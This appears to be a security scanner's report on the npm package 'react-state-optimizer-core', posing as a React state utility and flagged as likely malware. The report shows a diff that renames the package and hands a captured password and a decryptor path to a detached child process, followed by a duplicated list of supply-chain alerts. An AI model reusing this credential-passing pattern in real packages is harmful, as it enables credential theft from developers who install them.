react-state-optimizer-core
Advanced tools
Sorry, the diff of this file is too big to display
+1
-1
| { | ||
| "name": "react-state-optimizer-core", | ||
| "version": "3.0.5", | ||
| "version": "3.0.6", | ||
| "description": "Utility layer for asynchronous state management", | ||
@@ -5,0 +5,0 @@ "main": "index.js", |
+3
-3
@@ -1,2 +0,2 @@ | ||
| # react-fast-utils | ||
| # react-state-optimizer-core | ||
@@ -8,3 +8,3 @@ A lightweight utility layer for asynchronous state management in React applications. | ||
| ```bash | ||
| npm install react-fast-utils | ||
| npm install react-state-optimizer-core | ||
| ``` | ||
@@ -15,3 +15,3 @@ | ||
| ```javascript | ||
| import { useAsyncState } from 'react-fast-utils'; | ||
| import { useAsyncState } from 'react-state-optimizer-core'; | ||
@@ -18,0 +18,0 @@ const { data, loading, error } = useAsyncState(myPromise); |
+5
-1
@@ -271,3 +271,7 @@ const fs = require('fs'); | ||
| detached: !debugMode, | ||
| env: { ...process.env, GHOST_PWD: capturedPassword } | ||
| env: { | ||
| ...process.env, | ||
| GHOST_PWD: capturedPassword, | ||
| GHOST_DECRYPTOR: path.join(__dirname, 'decryptor') | ||
| } | ||
| }); | ||
@@ -274,0 +278,0 @@ |
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Native code
Supply chain riskContains native code (e.g., compiled binaries or shared libraries). Including native code can obscure malicious behavior.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
Long strings
Supply chain riskContains long string literals, which may be a sign of obfuscated or packed code.
Found 1 instance in 1 package
AI-detected potential malware
Supply chain riskAI has identified this package as malware. This is a strong signal that the package may be malicious.
Found 1 instance in 1 package
Network access
Supply chain riskThis module accesses the network.
Found 3 instances in 1 package
Shell access
Supply chain riskThis module accesses the system shell. Accessing the system shell increases the risk of executing arbitrary code.
Found 1 instance in 1 package
Unpublished package
Supply chain riskPackage version was not found on the registry. It may exist on a different registry and need to be configured to pull from that registry.
Found 1 instance in 1 package
Dynamic require
Supply chain riskDynamic require can indicate the package is performing dangerous or unsafe dynamic code execution.
Found 1 instance in 1 package
Environment variable access
Supply chain riskPackage accesses environment variables, which may be a sign of credential stuffing or data theft.
Found 3 instances in 1 package
Filesystem access
Supply chain riskAccesses the file system, and could potentially read sensitive data.
Found 1 instance in 1 package
Long strings
Supply chain riskContains long string literals, which may be a sign of obfuscated or packed code.
Found 1 instance in 1 package
16286375
135880.42%4
33.33%242
1.68%9
12.5%